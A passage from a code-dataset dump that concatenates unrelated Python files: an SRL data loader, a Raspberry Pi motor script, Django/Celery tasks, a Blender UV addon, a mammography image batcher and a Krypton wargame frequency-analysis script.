Pre-trained Embedding Model and merging it with current dict\")\n\tif not config[\"pretrained_embedding\"]:\n\t\tprint(\"No Pre-trained Embedding!\")\n\t\treturn None\n\n\t# Get values from pre-trained word embedding\n\tembedding_dict = {}\n\tcnt = 0\n\texcept_cnt = 0\n\ttotal_size = len(word_to_id)\n\twith open(embed_file_path, 'r') as f:\n\t# with open(embed_file_path, 'rb') as f:\n\t\tfor idx, line in enumerate(f.readlines()):\n\t\t\t# try:\n\t\t\t# \tline = line.decode(\"euc-kr\")\n\t\t\t# except:\n\t\t\t# \texcept_cnt += 1\n\t\t\t# \tcontinue\n\t\t\tif line.strip():\n\t\t\t\tword = line.strip().split(' ')[0]\n\t\t\t\tif word == \"PADDING\":\n\t\t\t\t\tword = \"\"\n\t\t\t\telif word == \"UNK\":\n\t\t\t\t\tword = \"\"\n\t\t\t\t_embedding = [v for v in line.strip().split(' ')[1:]]\n\t\t\t\tembedding = np.array(_embedding)\n\t\t\t\tembedding_dict[word] = embedding\n\n\n\tnp.random.seed(0)\t#for reproducibility\n\tembedding_matrix = np.random.randn(len(word_to_id), config[\"word_dim\"])\t#currently 100\n\n\tfor k, v in word_to_id.items():\n\t\tword_vector = embedding_dict.get(k, None)\n\t\tif word_vector is not None:\n\t\t\tcnt += 1\n\t\t\tembedding_matrix[v] = word_vector\n\n\t#replace padding in embedding matrix into 
np.zeros\n\tpad_index = word_to_id['']\n\tembedding_matrix[pad_index] = np.zeros(config[\"word_dim\"])\n\n\tprint(\"Loaded word embedding from %s\" % embed_file_path)\n\tprint(\"%s / %s\" %(cnt, total_size))\n\tprint(\"word except : %s\", except_cnt)\n\treturn embedding_matrix\n\n\ndef only_frequent_affix(dico, frequency):\n\tselectedKeys = list()\n\tfor k, v in dico.items():\n\t\tif v < frequency:\n\t\t\tselectedKeys.append(k)\n\n\tfor k in selectedKeys:\n\t\tif k in dico:\n\t\t\tdel dico[k]\n\n\treturn dico\n\n\ndef affix_mapping_with_word(sentences, type, size, frequency):\n\t\"\"\"\n\tBuilds the affix dictionary.\n\tUndecided whether to build it from morphemes or from the original words;\n\tthis variant builds it from the original words.\n\t:param sentences: sentence information as a list\n\t:param *_size: size of the n-gram for *\n\t:param frequency: frequency threshold, e.g. appears 50 times or more\n\t:return:\n\t\"\"\"\n\taffixes = []\n\tfor sentence in sentences:\n\t\taffix = []\n\t\t# building affixes from whole words\n\t\tfor word in sentence[-2]:\n\t\t\taff_tmp = \"\"\n\t\t\tif len(word) < size:\n\t\t\t\tfor i in range(size - len(word)):\n\t\t\t\t\taff_tmp += \"^\"\n\t\t\t\tif type == 'prefix':\n\t\t\t\t\taff_tmp = aff_tmp + word # e.g. with size 3: '^^안'\n\t\t\t\telif type == 'suffix':\n\t\t\t\t\taff_tmp = word + aff_tmp # e.g. with size 3: '다^^'\n\t\t\telif len(word) == size:\n\t\t\t\taff_tmp = word\n\t\t\telse:\n\t\t\t\tidx = size - len(word)\n\t\t\t\tif type == 'prefix':\n\t\t\t\t\taff_tmp = word[:idx] # with size 3, apple => app\n\t\t\t\telif type == 'suffix':\n\t\t\t\t\taff_tmp = word[-idx:] # with size 3, apple => ple\n\t\t\taffix.append(aff_tmp)\n\t\taffixes.append(affix)\n\n\twhole_aff_dico = create_dico(affixes) # full affix dictionary\n\taff_dico = only_frequent_affix(whole_aff_dico, frequency) # dictionary keeping only the frequent entries\n\taff_dico[\"\"] = 10000001\n\taff_dico[\"\"] = 10000000\n\n\taff_to_id, id_to_aff = create_mapping(aff_dico)\n\tprint(\"Found %i unique %s\" % (len(aff_dico), type))\n\treturn aff_dico, aff_to_id, id_to_aff\n\n\ndef affix_mapping_with_pos(sentences, type, size, frequency):\n\t\"\"\"\n\tBuilds the affix dictionary.\n\tUndecided whether to build it from morphemes or from the original words;\n\tthis variant builds it from morphemes.\n\t:param sentences: sentence information as a list\n\t:param *_size: size of the n-gram for *\n\t:param frequency: frequency threshold, e.g. appears 50 times or more\n\t:return:\n\t\"\"\"\n\taffixes = []\n\tfor sentence in sentences:\n\t\taffix = []\n\t\t# when building affixes from whole words:\n\t\t# for word in sentence[-2]:\n\n\t\t# building affixes from morphemes\n\t\tfor eojeol in sentence[-3]:\n\t\t\tword = \"\"\n\t\t\tfor w in eojeol.split('|'):\n\t\t\t\tword += w.split('/')[0]\n\n\t\t\taff_tmp = \"\"\n\t\t\tif len(word) < size:\n\t\t\t\tfor i in range(size - len(word)):\n\t\t\t\t\taff_tmp += \"^\"\n\t\t\t\tif type == 'prefix':\n\t\t\t\t\taff_tmp = aff_tmp + word # e.g. with size 3: '^^안'\n\t\t\t\telif type == 'suffix':\n\t\t\t\t\taff_tmp = word + aff_tmp # e.g. with size 3: '다^^'\n\t\t\telif len(word) == size:\n\t\t\t\taff_tmp = word\n\t\t\telse:\n\t\t\t\tidx = size - len(word)\n\t\t\t\tif type == 'prefix':\n\t\t\t\t\taff_tmp = word[:idx] # with size 3, apple => app\n\t\t\t\telif type == 'suffix':\n\t\t\t\t\taff_tmp = word[-idx:] # with size 3, apple => ple\n\t\t\taffix.append(aff_tmp)\n\t\taffixes.append(affix)\n\n\twhole_aff_dico = create_dico(affixes) # full affix dictionary\n\taff_dico = only_frequent_affix(whole_aff_dico, frequency) # dictionary keeping only the frequent entries\n\taff_dico[\"\"] = 10000001\n\taff_dico[\"\"] = 10000000\n\n\taff_to_id, id_to_aff = create_mapping(aff_dico)\n\tprint(\"Found %i unique %s\" % (len(aff_dico), type))\n\treturn aff_dico, aff_to_id, id_to_aff\n\n\ndef get_affix_ids_with_word(sentence, aff_to_ids, type, 
config):\n\tids = []\n\tfor word in sentence:\n\t\taff_tmp = \"\"\n\t\t# suf_tmp = \"\"\n\t\tif len(word) < config[\"affix_size\"]:\n\t\t\tfor i in range(config[\"affix_size\"] - len(word)):\n\t\t\t\taff_tmp += \"^\"\n\t\t\tif type == 'prefix':\n\t\t\t\taff_tmp = aff_tmp + word # e.g. with size 3: '^^안'\n\t\t\telif type == 'suffix':\n\t\t\t\taff_tmp = word + aff_tmp # e.g. with size 3: '다^^'\n\t\telif len(word) == config[\"affix_size\"]:\n\t\t\taff_tmp = word\n\t\telse:\n\t\t\tidx = config[\"affix_size\"] - len(word)\n\t\t\tif type == 'prefix':\n\t\t\t\taff_tmp = word[:idx] # with size 3, apple => app\n\t\t\telif type == 'suffix':\n\t\t\t\taff_tmp = word[-idx:] # with size 3, apple => ple\n\t\tif aff_tmp in aff_to_ids:\n\t\t\tids.append(aff_to_ids[aff_tmp])\n\t\telse:\n\t\t\tids.append(aff_to_ids[\"\"])\n\treturn ids\n\n\ndef get_affix_ids_with_pos(sentence, aff_to_ids, type, config):\n\tids = []\n\tfor eojeol in sentence:\n\t\tword = \"\"\n\t\tfor w in eojeol.split('|'):\n\t\t\tword += w.split('/')[0]\n\t\taff_tmp = \"\"\n\t\t# suf_tmp = \"\"\n\t\tif len(word) < config[\"affix_size\"]:\n\t\t\tfor i in range(config[\"affix_size\"] - len(word)):\n\t\t\t\taff_tmp += \"^\"\n\t\t\tif type == 'prefix':\n\t\t\t\taff_tmp = aff_tmp + word # e.g. with size 3: '^^안'\n\t\t\telif type == 'suffix':\n\t\t\t\taff_tmp = word + aff_tmp # e.g. with size 3: '다^^'\n\t\telif len(word) == config[\"affix_size\"]:\n\t\t\taff_tmp = word\n\t\telse:\n\t\t\tidx = config[\"affix_size\"] - len(word)\n\t\t\tif type == 'prefix':\n\t\t\t\taff_tmp = word[:idx] # with size 3, apple => app\n\t\t\telif type == 'suffix':\n\t\t\t\taff_tmp = word[-idx:] # with size 3, apple => ple\n\t\tif aff_tmp in aff_to_ids:\n\t\t\tids.append(aff_to_ids[aff_tmp])\n\t\telse:\n\t\t\tids.append(aff_to_ids[\"\"])\n\treturn ids\n\n\ndef prepare_dataset(dataset, word_to_id, pumsa_to_id, char_to_id, tag_to_id, elmo_dict, config, train=True):\n\t\"\"\"\n\tPerforms preprocessing on the dataset.\n\treturn : list of list of dictionary\n\tdictionary\n\t\t- word indices\n\t\t- word char indices\n\t\t- tag indices\n\t\"\"\"\n\tnone_index = tag_to_id[\"-\"] if \"-\" in tag_to_id else tag_to_id[\"-\"]\n\n\tdata = []\n\tfor idx, sen in enumerate(dataset):\n\t\t# sen : [['1', '2', '3', '4', '5', '6', '7', '8', '9', '10'], ['나는', '다른', '방배들과', '한', '다발씩', '묶여', '컴컴한', '금융기관', '속으로', '옮겨졌다.'], ['ARG0', '-', '-', '-', '-', '-', '-', '-', 'ARG3', '-']]\n\t\tfw_elmo_input = []\n\t\tif config['elmo']:\n\t\t\tfor elmo_morph in sen[9]:\n\t\t\t\ttmp_morph = []\n\t\t\t\telmo_idx = elmo_morph.rfind(\"/\")\n\t\t\t\tfor elmo_char in elmo_morph[:elmo_idx]:\n\t\t\t\t\tif len(elmo_morph[:elmo_idx]) >= 15:\n\t\t\t\t\t\ttmp_morph.append(elmo_dict[\"\"])\n\t\t\t\t\t\tbreak\n\t\t\t\t\telif elmo_char in elmo_dict:\n\t\t\t\t\t\ttmp_morph.append(elmo_dict[elmo_char])\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_morph.append(elmo_dict[\"\"])\n\t\t\t\tfw_elmo_input.append(tmp_morph)\n\n\t\tword_ids1 = [word_to_id[w] if w in word_to_id else word_to_id[''] for w in sen[1]]\n\t\tword_ids2 = [word_to_id[w] if w in word_to_id else word_to_id[''] for w in sen[2]]\n\t\tword_ids3 = [word_to_id[w] if w in word_to_id else word_to_id[''] for w in sen[3]]\n\t\tword_ids4 = [word_to_id[w] if w in word_to_id else word_to_id[''] for w in sen[4]]\n\n\t\tpumsa_ids1 = [pumsa_to_id[p] if p in pumsa_to_id else pumsa_to_id[''] for p in sen[5]]\n\t\tpumsa_ids2 = [pumsa_to_id[p] if p in pumsa_to_id else pumsa_to_id[''] for p in sen[6]]\n\t\tpumsa_ids3 = [pumsa_to_id[p] if p in pumsa_to_id else pumsa_to_id[''] for p in sen[7]]\n\t\tpumsa_ids4 = 
[pumsa_to_id[p] if p in pumsa_to_id else pumsa_to_id[''] for p in sen[8]]\n\n\t\tchars = [[char_to_id[c if c in char_to_id else '']\n\t\t\t\t for c in word] for word in sen[-2]]\n\t\tif train:\n\t\t\ttag_ids = [tag_to_id[l] for l in sen[-1]]\n\t\telse:\n\t\t\ttag_ids = [none_index for _ in chars]\n\t\tdata.append([word_ids1, word_ids2, word_ids3, word_ids4,\n\t\t\t\t\t pumsa_ids1, pumsa_ids2, pumsa_ids3, pumsa_ids4, fw_elmo_input, sen[10], sen[11], chars, tag_ids])\n\n\treturn data\n\n\ndef _search_index_by_dict( dict, key, size):\n\tif key in dict:\n\t\treturn dict[key]\n\telse:\n\t\tif \"UNK\" in dict:\n\t\t\treturn dict[\"UNK\"]\n\t\telse:\n\t\t\ttemp = [0.0] * 15\n\t\t\ttemp[0] = 1.0\n\t\t\treturn temp\n","sub_path":"labeling_tool/Naver_challange_winners/SRL/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":12563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"197714982","text":"import RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(12, GPIO.OUT)\nGPIO.setup(38, GPIO.OUT)\nGPIO.setup(40, GPIO.OUT)\n#GPIO.setup(35, GPIO.OUT)\n#GPIO.setup(31, GPIO.OUT)\nGPIO.setup(29, GPIO.OUT)\n#GPIO.output(31, False)\nGPIO.output(29, False)\nGPIO.output(38,False)\nGPIO.output(40,False)\np= GPIO.PWM(12,60)\n#q= GPIO.PWM(35,60)\nreverse=0\nforward=1\nvar=1\np.start(0)\n#q.start(0)\n\nwhile var==1:\n try:\n prespeed,preturn= input(\"Type 2 numbers 1=slow, 2=median, 10=fast and neg. for reverse \").split()\n if int(prespeed)<0:\n prespeed=int(prespeed)*int(-1)\n reverse=1\n forward=0\n else:\n reverse=0\n forward=1\n if float(preturn)<0:\n preturn=float(preturn)*float(-1)\n treverse=1\n tforward=0\n else:\n treverse=0\n tforward=1\n \n except (KeyboardInterrupt, SystemExit):\n print (\"user exit\")\n var=0\n GPIO.output(38,False)\n GPIO.output(40,False)\n #GPIO.output(31, False)\n GPIO.output(29, False)\n p.stop()\n #q.stop()\n GPIO.cleanup()\n \n speed= int(prespeed) * int('10')\n turn= float(preturn) * float('5')\n fspeed= float(speed)\n fturn= float(turn)\n #print (fturn)\n p.ChangeDutyCycle(fspeed)\n #q.ChangeDutyCycle(fturn)\n\n\n try:\n GPIO.output(38, reverse)\n GPIO.output(40, forward)\n #GPIO.output(31, reverse)\n GPIO.output(29, forward) \n time.sleep(5)\n #GPIO.output(31, False)\n GPIO.output(29, False) \n \n except KeyboardInterrupt:\n print (\"user exit 2\")\n var=0\n GPIO.output(38,False)\n GPIO.output(40,False)\n GPIO.output(31, False)\n GPIO.output(29, False)\n GPIO.cleanup()\n\n\n\n","sub_path":"motor_pwm_test2.py","file_name":"motor_pwm_test2.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"636920445","text":"import logging\nfrom celery import shared_task, Task\nfrom django.db.models import F\nfrom breathecode.services.activecampaign import ActiveCampaign\nfrom .models import FormEntry, ShortLink, ActiveCampaignWebhook\nfrom .actions import register_new_lead, save_get_geolocal\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseTaskWithRetry(Task):\n autoretry_for = (Exception, )\n # seconds\n retry_kwargs = {'max_retries': 5, 'countdown': 60 * 5}\n retry_backoff = True\n\n\n@shared_task\ndef persist_leads():\n logger.debug('Starting persist_leads')\n entries = FormEntry.objects.filter(storage_status='PENDING')\n for entry in entries:\n form_data = entry.toFormData()\n result = register_new_lead(form_data)\n if result is not None and result != False:\n save_get_geolocal(entry, 
form_data)\n\n return True\n\n\n@shared_task(bind=True, base=BaseTaskWithRetry)\ndef persist_single_lead(self, form_data):\n logger.debug('Starting persist_single_lead')\n entry = register_new_lead(form_data)\n if entry is not None and entry != False:\n save_get_geolocal(entry, form_data)\n\n return True\n\n\n@shared_task(bind=True, base=BaseTaskWithRetry)\ndef update_link_viewcount(self, slug):\n logger.debug('Starting update_link_viewcount')\n ShortLink.objects.filter(slug=slug).update(hits=F('hits') + 1)\n\n\n@shared_task(bind=True, base=BaseTaskWithRetry)\ndef async_activecampaign_webhook(self, webhook_id):\n logger.debug('Starting async_activecampaign_webhook')\n status = 'ok'\n\n webhook = ActiveCampaignWebhook.objects.filter(id=webhook_id).first()\n ac_academy = webhook.ac_academy\n\n if ac_academy is not None:\n try:\n client = ActiveCampaign(ac_academy.ac_key, ac_academy.ac_url)\n client.execute_action(webhook_id)\n except Exception as e:\n logger.debug('ActiveCampaign Webhook Exception')\n logger.debug(str(e))\n status = 'error'\n\n else:\n message = f\"ActiveCampaign Academy Profile for webhook {webhook_id} doesn\\'t exist\"\n\n webhook.status = 'ERROR'\n webhook.status_text = message\n webhook.save()\n\n logger.debug(message)\n status = 'error'\n\n logger.debug(f'ActiveCampaign webhook status: {status}')\n","sub_path":"breathecode/marketing/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"351333335","text":"__author__ = \"kgeogeo, mem, Nutti \"\n__status__ = \"production\"\n__version__ = \"4.0\"\n__date__ = \"XX XXX 2015\"\n\nimport bpy\nimport bmesh\nfrom bpy.app.handlers import persistent\nfrom bpy_extras.view3d_utils import location_3d_to_region_2d as loc3d2d\nfrom bpy.types import Operator\nfrom bpy.props import FloatVectorProperty\nimport mathutils\nfrom mathutils import *\nfrom math import *\n\n\ndef find_uv(context):\n obj_data = bmesh.from_edit_mesh(context.object.data)\n l = []\n first = 0\n diff = 0\n uvs = []\n for f, face in enumerate(obj_data.faces):\n for v, vertex in enumerate(face.verts):\n if vertex.select:\n uvs.append(obj_data.faces[f].loops[v][obj_data.loops.layers.uv.active].uv.copy())\n l.append([f, v])\n if first == 0:\n v1 = vertex.link_loops[0].vert.co\n sv1 = loc3d2d(context.region, context.space_data.region_3d, v1)\n v2 = vertex.link_loops[0].link_loop_next.vert.co\n sv2 = loc3d2d(context.region, context.space_data.region_3d, v2)\n vres = sv2 - sv1\n va = vres.angle(Vector((0.0, 1.0)))\n\n uv1 = vertex.link_loops[0][obj_data.loops.layers.uv.active].uv\n uv2 = vertex.link_loops[0].link_loop_next[obj_data.loops.layers.uv.active].uv\n uvres = uv2 - uv1\n uva = uvres.angle(Vector((0.0, 1.0)))\n diff = uva - va\n first += 1\n\n return l, diff, uvs\n\n# Operator Class to pan the view3D\n\n\nclass MUV_MVUV(bpy.types.Operator):\n bl_idname = \"view3d.muv_mvuv\"\n bl_label = \"Move the UV from 3D view\"\n bl_options = {'REGISTER', 'UNDO'}\n\n l = []\n uva = 0\n first_mouse = FloatVectorProperty(name=\"OffsetUV\", default=(0.0, 0.0), subtype='XYZ', size=2)\n offsetuv = FloatVectorProperty(name=\"OffsetUV\", default=(0.0, 0.0), subtype='XYZ', size=2)\n old_offsetuv = FloatVectorProperty(name=\"old_OffsetUV\", default=(0.0, 0.0), subtype='XYZ', size=2)\n firstuv = FloatVectorProperty(name=\"FirstUV\", default=(0.0, 0.0), subtype='XYZ', size=2)\n first_time = True\n ini_uvs = []\n\n @classmethod\n def poll(cls, context):\n return 
(context.edit_object)\n\n def modal(self, context, event):\n if self.first_time is True:\n self.first_mouse = Vector((event.mouse_region_x, event.mouse_region_y))\n if event.type == 'LEFTMOUSE' and event.value == 'RELEASE':\n self.first_time = False\n return {'RUNNING_MODAL'}\n ob = context.object\n obj_data = bmesh.from_edit_mesh(ob.data)\n div = 10000\n self.offsetuv += Vector(((event.mouse_region_x - self.first_mouse.x) / div,\n (event.mouse_region_y - self.first_mouse.y) / div))\n\n o = self.offsetuv\n oo = self.old_offsetuv\n for i, j in self.l:\n d = obj_data.faces[i].loops[j][obj_data.loops.layers.uv.active]\n vec = Vector((o.x - o.y, o.x + o.y))\n d.uv = d.uv - Vector((oo.x, oo.y)) + vec\n\n self.old_offsetuv = vec\n self.first_mouse = Vector((event.mouse_region_x, event.mouse_region_y))\n ob.data.update()\n\n if context.user_preferences.inputs.select_mouse == 'RIGHT':\n confirm_btn = 'LEFTMOUSE'\n cancel_btn = 'RIGHTMOUSE'\n else:\n confirm_btn = 'RIGHTMOUSE'\n cancel_btn = 'LEFTMOUSE'\n\n print(repr(event.type))\n\n if event.type == cancel_btn and event.value == 'PRESS':\n for (f, v), uv in zip(self.l, self.ini_uvs):\n obj_data.faces[f].loops[v][obj_data.loops.layers.uv.active].uv = uv\n return {'FINISHED'}\n if event.type == confirm_btn and event.value == 'PRESS':\n return {'FINISHED'}\n return {'RUNNING_MODAL'}\n\n def execute(self, context):\n self.first_time = True\n context.window_manager.modal_handler_add(self)\n self.l, self.uva, self.ini_uvs = find_uv(context)\n return {'RUNNING_MODAL'}\n","sub_path":"scripts/addons_extern/uv_magic_uv/muv_mvuv_ops.py","file_name":"muv_mvuv_ops.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"207375893","text":"import dicom\nimport numpy as np\nfrom PIL import Image\nimport csv\nimport os\nfrom scipy.misc import imresize, imsave\nimport matplotlib.pyplot as plt\n\npathology_dict = {'MALIGNANT': 1, 'BENIGN': 0, 'BENIGN_WITHOUT_CALLBACK': 0}\nclass Batcher:\n def __init__(self, batch_sz, metadata, indices, mass_headers, calc_headers, root, attr2onehot, mean=0, std=0, new_batch=False):\n '''\n This batcher takes in rows of metadata formatted\n specifically for DDSM images with the image directory\n structure downloaded from TCIA\n '''\n self.batch_sz = batch_sz\n self.metadata = metadata\n self.mass_headers = mass_headers\n self.calc_headers = calc_headers\n self.indices = indices\n self.root = root\n self.attr2onehot = attr2onehot\n self.mean = mean\n self.new_batch = new_batch\n self.std = std\n \n def visualize(self, img):\n '''\n debug tool: visualize the grey scale image for sanity check.\n '''\n plt.imshow(img, cmap='gray')\n plt.show()\n\n def to_uint8(self, img):\n '''\n converts an image from uint16 to uint8 format.\n uses lookup table to reduce memory usage\n also more efficient\n '''\n lut = np.arange(2**16, dtype='uint16')\n lut -= np.amin(img)\n lut //= int((np.amax(img) - np.amin(img) + 1) / 256)\n return np.take(lut, img)\n\n def resize(self, img, H = 299, W = 299):\n '''\n resize all images to 4000 x 3000 to be batchable\n '''\n return imresize(img, (H, W))\n\n def get_train_stats(self):\n '''\n first pass of images to get mean pixel value for preprocessing\n '''\n it = self.get_iterator(mean_process=True) \n mean = 0.0\n counter = 0\n means = []\n for imgs, labels, _, paths in it:\n for im, image_path in zip(imgs, paths):\n counter += 1\n im = self.to_uint8(im)\n im = self.resize(im)\n im = im.astype(np.float64)\n 
print('saving {} inside get_train_mean'.format(image_path))\n np.save(image_path, im)\n im /= 255\n H, W = im.shape[0], im.shape[1]\n # incremental mean update for numerical stability\n mean += (np.sum(im) - mean * H * W) / (counter * H * W) \n means.append(np.sum(im) / (H * W))\n std = np.std(means)\n return mean, std\n\n def preprocess(self, img, unseen=False):\n '''\n Preprocessing step:\n convert to 8 bit, resize to H X W, reduce by mean\n '''\n if unseen:\n img = self.to_uint8(img)\n img = self.resize(img)\n img = img.astype(np.float64)\n #if self.mean != 0: \n # img /= 255\n # img -= self.mean \n #if self.std != 0: \n # img /= self.std\n return img\n\n def get_image_from_path(self, path):\n path += '/' + next(os.walk(os.path.expanduser(path)))[1][0]\n path += '/' + next(os.walk(os.path.expanduser(path)))[1][0]\n path += '/' + next(os.walk(os.path.expanduser(path)))[2][0]\n # 4. read image from DICOM format into 16bit pixel value\n DCM_img = dicom.read_file(path)\n img = np.asarray(DCM_img.pixel_array)\n return img\n\n def generate_attribute(self, row, is_mass):\n generic_field = ['breast_density', 'abn_num','assessment', 'subtlety']\n mass_fields = ['mass_shape', 'mass_margins']\n calc_fields = ['calc_type', 'calc_distribution']\n attribute = [] #[0] * 4\n\n # mass: shape 10, margin 7\n # calc: type 15, distrib 6\n # feat1: 17 feat2: 21\n if is_mass:\n for field in generic_field:\n attribute.append(self.attr2onehot['mass'][field][row[self.mass_headers[field]]])\n for field, pad in zip(mass_fields, [15, 6]):\n mass_feature = [0] * len(self.attr2onehot['mass'][field])\n parts = row[self.mass_headers[field]].split('-')\n for part in parts:\n mass_feature[self.attr2onehot['mass'][field][part] - 1] = 1\n #mass_feature[self.attr2onehot['mass'][field][row[self.mass_headers[field]]] - 1] = 1\n attribute += mass_feature\n attribute += [0] * pad\n else:\n for field in generic_field:\n attribute.append(self.attr2onehot['calc'][field][row[self.calc_headers[field]]])\n for field, pad in zip(calc_fields, [10, 7]):\n attribute += [0] * pad\n calc_feature = [0] * len(self.attr2onehot['calc'][field])\n parts = row[self.calc_headers[field]].split('-')\n for part in parts:\n calc_feature[self.attr2onehot['calc'][field][part] - 1] = 1\n #calc_feature[self.attr2onehot['calc'][field][row[self.calc_headers[field]]] - 1] = 1\n attribute += calc_feature\n\n return attribute\n \n def get_iterator(self, mean_process=False):\n '''\n Data iterator. get_iterator returns all batches\n in the form of (X, y) tuples\n '''\n X = []\n y = []\n attributes = []\n new_image_flag = False\n paths = []\n counter = 0\n already_seen = set()\n for i in range(len(self.indices)):\n \n row = self.metadata[self.indices[i]]\n path = self.root + '/'\n # 1. figure out if this image is a mass or a calc\n if 'Mass' in row[self.mass_headers['od_img_path']]:\n path += 'Mass-Training'\n else:\n path += 'Calc-Training'\n # 2. build the image path\n path += '_' + row[self.mass_headers['patient_id']] \\\n + '_' + row[self.mass_headers['side']] + '_' \\\n + row[self.mass_headers['view']]\n \n if not os.path.exists(path) or path in already_seen:\n continue\n\n already_seen.add(path)\n # 3. 
wade through two layers of useless directories\n down_a_level = next(os.walk(os.path.expanduser(path)))\n image_name = 'image_{}'.format(row[self.mass_headers['patient_id']])\n image_path = path + '/' + image_name\n # if we're trying to just get images for mean calculations\n if mean_process:\n img = self.get_image_from_path(path)\n elif self.new_batch:\n # this means we're relying on mean-processed images to do further processing on\n try:\n img = np.load(image_path + '.npy')\n except:\n raise Exception('Most likely a file read error, or that somehow we tried to read a file we haven\\'t preprocessed before')\n # no unseen flag because we've already seen these images!\n img = self.preprocess(img)\n print('saving {} inside get_iterator'.format(image_path))\n print(img)\n np.save(image_path, img)\n else:\n # we are assuming that all the images have been processed before\n try:\n # print('opening completely preprocessed {} inside get_iterator'.format(image_path))\n img = np.load(image_path + '.npy')\n except:\n img = self.get_image_from_path(path)\n img = self.preprocess(img, unseen=True)\n print('saving {} inside get_iterator'.format(image_path))\n np.save(image_path, img)\n # 6. add the image to the batch \n X.append(img)\n #imsave(\"out/{}.png\".format(row[0]), img)\n # 7. do some mojo with the label and append to y\n # probably gonna be one hot or something\n label = pathology_dict[row[self.mass_headers['pathology']]]\n y.append(label)\n\n # 8. Get those attributes\n if 'Mass' in row[self.mass_headers['od_img_path']]: \n attributes.append(self.generate_attribute(row, True))\n else:\n attributes.append(self.generate_attribute(row, False))\n # only do this if we are trying to make a new batch, and if we are catering to get_train_mean()\n if mean_process:\n paths.append(image_path)\n # 8. check if our batch is ready\n counter += 1\n if counter >= self.batch_sz: \n if mean_process:\n yield (np.asarray(X), np.asarray(y), np.asarray(attributes), paths)\n else:\n yield (np.asarray(X), np.asarray(y), np.asarray(attributes))\n X = []\n y = []\n paths = []\n attributes = []\n counter = 0\n if not X or not y:\n return\n\n if mean_process:\n yield (np.asarray(X), np.asarray(y), np.asarray(attributes), paths)\n else:\n X_out = np.asarray(X)\n y_out = np.asarray(y)\n attrib_out = np.asarray(attributes)\n yield (X_out, y_out, attrib_out)\n","sub_path":"util/Batcher.py","file_name":"Batcher.py","file_ext":"py","file_size_in_byte":9254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"7427947","text":"# -*- coding: utf-8 -*-\n\nfrom ..database import db_function\nfrom ..dbmodels import Game\nfrom . 
import versions\n\n\n@db_function('re_mode')\ndef re_mode(game_id, mode):\n vclass = versions.get_game_version(game_id)\n\n if game_id in re_mode.cache:\n return re_mode.cache[game_id] == vclass.modes[mode]\n\n game = Game.query.filter(Game.id == game_id).first()\n re_mode.cache[game_id] = game.mode\n\n return game.mode == vclass.modes[mode]\n\n\nre_mode.cache = {}\n\n\n@db_function('re_mut')\ndef re_mut(game_id, mut):\n vclass = versions.get_game_version(game_id)\n\n if game_id in re_mut.cache:\n return mut in vclass.mutslist(\n re_mut.cache[game_id][0],\n re_mut.cache[game_id][1]\n )\n\n game = Game.query.filter(Game.id == game_id).first()\n\n re_mut.cache[game_id] = (game.mode, game.mutators)\n\n return (mut in vclass.mutslist(game.mode, game.mutators))\n\n\nre_mut.cache = {}\n","sub_path":"statsdbinterface/redeclipse/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"53960835","text":"from frequency_analysis import frequency_analysis\nfrom os import listdir\nfrom find_key import find_key\n\ndirectory = \"outs\"\nfiles = listdir(directory)\nfiles.sort()\nfiles = [directory+'/'+file for file in files]\n\nsize = 1\nfa_res = []\ntemp = '0'\nfor filename in files:\n if filename[-3]!=temp:\n fa_res += [[]]\n temp = filename[-3]\n aux = [frequency_analysis(filename)[0][:size]]\n fa_res[-1] += aux\n\nfor out in fa_res:\n find_key(out, size, ['found1', 'found2', 'found3', 'krypton6'])\n","sub_path":"krypton5/decifer.py","file_name":"decifer.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"379081364","text":"# Copyright 2016 United States Government as represented by the Administrator\n# of the National Aeronautics and Space Administration. All Rights Reserved.\n#\n# Portion of this code is Copyright Geoscience Australia, Licensed under the\n# Apache License, Version 2.0 (the \"License\"); you may not use this file\n# except in compliance with the License. You may obtain a copy of the License\n# at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# The CEOS 2 platform is licensed under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom django.shortcuts import render, redirect\nfrom django.template import loader, RequestContext\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom django.conf import settings\nfrom django.http import HttpResponse, JsonResponse\nfrom django.contrib.auth.decorators import login_required\n\nfrom email.message import EmailMessage\nimport smtplib\n\nfrom .forms import SubmitFeedbackForm\n\ndef home(request):\n \"\"\"\n Navigates to the home page of the application.\n\n **Context**\n\n **Template**\n\n :template:`home/index.html`\n \"\"\"\n\n context = {\n\n }\n return render(request, 'index.html', context)\n\n@login_required\ndef submit_feedback(request):\n if request.method == 'POST':\n form = SubmitFeedbackForm(request.POST)\n if form.is_valid():\n msg = EmailMessage()\n msg['From'] = \"admin@ceos-cube.org\"\n msg['To'] = settings.ADMIN_EMAIL\n msg['Subject'] = form.cleaned_data.get('feedback_reason')\n\n msg.set_content(\"Feedback sent from user: \" + request.user.email + \"\\n\" + form.cleaned_data.get('feedback'))\n\n with smtplib.SMTP('localhost') as s:\n s.send_message(msg)\n\n form_class = 